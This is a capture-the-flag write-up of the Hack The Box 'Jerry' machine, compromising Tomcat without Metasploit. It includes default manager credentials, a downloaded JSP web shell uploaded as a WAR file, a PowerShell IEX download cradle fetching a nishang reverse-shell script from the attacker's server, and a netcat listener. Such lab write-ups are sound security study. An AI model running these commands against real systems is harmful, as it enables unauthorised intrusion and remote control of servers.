HTB(Jerry) Write UP No Metasploit

Quick write up on Jerry from HTB

nmap -sC -sV 10.10.10.95

returns tomcat on 8080

drawing

Go the 10.10.10.95:8080 and check it out, server status asks for a password. admin:admin works. nothing too crazy there, try going to the manager app link.

drawing

admin:admin doesnt work. the 404 page says the default is tomcat:s3cret……clear your cache and that works. Also could be brute forced with hydra. Using SecLists From github, they have wordlist specific to tomcat

drawing

If you scroll down you see you can upload war files. i think kali comes with one by default you could try. In this dir /usr/share/webshells/ but i just googled for jsp shells and found this https://gist.github.com/nikallass/5ceef8c8c02d58ca2c69a29a92d2f461 clicked on raw,

curl https://gist.githubusercontent.com/nikallass/5ceef8c8c02d58ca2c69a29a92d2f461/raw/8656cc80ace93c8095b0c7d0c45b917d542fed5c/cmd.jsp > cmd.jsp

and was able to download it, server only allows war files, so run this in bash

 zip cmd.war cmd.jsp

upload the file, go to server:8080/cmd/cmd.jsp

and you should see this

drawing

whoami shows you have code execution as system, nice. this machine is 64 bit according to page that allows war file uploads

drawing

so you have to run 64 bit powershell, googling 64 bit powershell path show this 64 bit version: C:\Windows\System32\WindowsPowerShell\v1.0\ get nishang if you dont already have it > git clone https://github.com/samratashok/nishang use the following shell found in the nishand Shells Dir Invoke-PowerShellTcp.ps1 edit the script to run the following function along with what port your going to be listening with netcat

drawing

Serve the script up with a python http server (i renamed the PS script to shell)

python3 -m http.server 80

set up a netcat listener based on the port you specifed in the powershells script

nc -lvnp 9000

run the following command on the java page

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe IEX (New-Object Net.WebClient).downloadString('http://10.10.14.32:80/Shell.ps1')

It runs 64 bit powershell and runs that one line commmand that reads a powershell script, imports the modules and runs the function specified.

drawing

You should see that after the command is run also, a GET request on your python webserver. And Last a shell on your netcat listener.

drawing

drawing

And thats it!